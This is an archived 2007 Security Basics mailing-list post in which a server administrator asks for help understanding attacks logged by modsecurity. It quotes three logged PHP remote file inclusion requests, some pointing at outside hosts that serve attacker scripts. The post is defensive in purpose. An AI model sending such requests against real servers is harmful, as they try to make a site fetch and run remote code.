Home page logo

basics logo Security Basics mailing list archives

PHP web exploit/vulnerability
From: Camilo Olea <colea () sunset com mx>
Date: Tue, 23 Oct 2007 11:29:47 -0500

Hello everyone,

I'm sorry if this is a stupid question, but I just wanted your input, maybe direct me to some links, another mail list, or whatever you might add would be highly appreciated; we have modsecurity installed on our server, and it has been logging many attacks like the following:

GET /content/multithumb/class.img2thumb.inc?mosConfig_absolute_path=http://beach.tsv-detti \
ngen.de/admin/ec.txt? HTTP/1.1

GET /index.php?option=com_%3Cwbr%20//mambots/*.php?mosConfig_absolute_path=uid=48(apache)% \
20gid=48(apache)%20groups=48(apache)%0A? HTTP/1.1

GET /index.php?option=http://0x0134.lan.io/pb.php? HTTP/1.1

I managed to get a copy of the php script which these attacks try to force the server to execute, I could post it here if that is correct and anybody could take a look at it and help me out a little to understand what it's trying to do.

Any help is appreciated, thanks in advance.

Camilo Olea

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]